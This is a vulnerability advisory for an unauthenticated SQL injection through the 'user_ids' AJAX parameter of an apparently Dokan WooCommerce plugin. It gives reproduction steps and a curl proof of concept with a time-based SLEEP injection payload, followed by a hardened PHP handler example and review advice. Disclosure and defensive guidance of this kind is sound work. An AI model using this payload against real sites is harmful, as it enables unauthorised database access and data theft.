The plugin does not properly sanitise and escape the `user_ids` parameter before using it in a SQL statement, leading to a SQL injection exploitable by unauthenticated users.
Proof of Concept
- Install WooCommerce (dependency, no setup required)
- Install the plugin, complete the wizard (no special configuration was performed - all defaults were accepted)
- As an unauthenticated user, access the "Store List" page (default at /store-listing/) and extract the "search_products_nonce" from the source
- Invoke the following curl command (with the extracted nonce in place) to induce a five-second sleep:
time curl "https://example.com/wp-admin/admin-ajax.php?action=dokan_json_search_products_and_variations&security=<NONCE-HERE>&term=x&user_ids='+AND+(SELECT+5362+FROM+(SELECT(SLEEP(5)))yWDg)--+qXby"
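The root cause above is a caller-supplied list of IDs being placed into SQL without being coerced to integers or passed through `$wpdb->prepare()`. The following is an added example, not the plugin's own code, of how an `admin-ajax.php` handler should treat such a parameter; the action name, nonce action and query columns are hypothetical stand-ins. The nonce check is kept to show its actual role: it only proves the request originated from a page that rendered the nonce (which here is the public store list), so it is neither an authorisation check nor a substitute for escaping.

```php
<?php
// Added example (hypothetical names, not the plugin's code): safe handling of a
// comma-separated "user_ids" parameter in an unauthenticated AJAX handler.

add_action( 'wp_ajax_nopriv_example_search_products', 'example_search_products' );
add_action( 'wp_ajax_example_search_products',        'example_search_products' );

function example_search_products() {
    global $wpdb;

    // Nonce: CSRF mitigation only. Anyone who can load the public page can
    // read it, so it does not limit who may call this endpoint.
    check_ajax_referer( 'search_products_nonce', 'security' );

    $term = isset( $_GET['term'] )
        ? sanitize_text_field( wp_unslash( $_GET['term'] ) )
        : '';

    // Weak pattern (what leads to the injection): interpolating the raw
    // parameter lets the caller supply SQL instead of a list of integers.
    //   $sql = "... AND post_author IN ({$_GET['user_ids']}) ...";

    // Hardened: wp_parse_id_list() splits on commas/whitespace and runs every
    // token through absint(), so quotes, keywords and comment markers become 0.
    $user_ids = isset( $_GET['user_ids'] )
        ? wp_parse_id_list( wp_unslash( $_GET['user_ids'] ) )
        : array();
    $user_ids = array_values( array_filter( $user_ids ) ); // drop the 0s

    $where = '';
    $args  = array( '%' . $wpdb->esc_like( $term ) . '%' );

    if ( ! empty( $user_ids ) ) {
        // One %d placeholder per ID, so each value is bound via prepare()
        // rather than concatenated into the statement.
        $placeholders = implode( ',', array_fill( 0, count( $user_ids ), '%d' ) );
        $where        = " AND post_author IN ({$placeholders})";
        $args         = array_merge( $args, $user_ids );
    }

    $sql = $wpdb->prepare(
        "SELECT ID, post_title
           FROM {$wpdb->posts}
          WHERE post_type IN ('product', 'product_variation')
            AND post_status = 'publish'
            AND post_title LIKE %s" . $where . "
          LIMIT 30",
        $args
    );

    wp_send_json( $wpdb->get_results( $sql ) );
}
```

With this shape, a value such as the one in the PoC URL can only ever contribute integers to the `IN (...)` list; the `SLEEP()` subquery never reaches MySQL, so the five-second delay that confirms the flaw no longer occurs. When reviewing a fix for this class of bug, check that every `IN (...)` list built from request data is either bound with per-element `%d` placeholders as above or produced by `implode(',', array_map('absint', ...))`, and that no `esc_sql()`-only path remains for numeric lists, since escaping quotes does not stop an unquoted integer context from being broken out of.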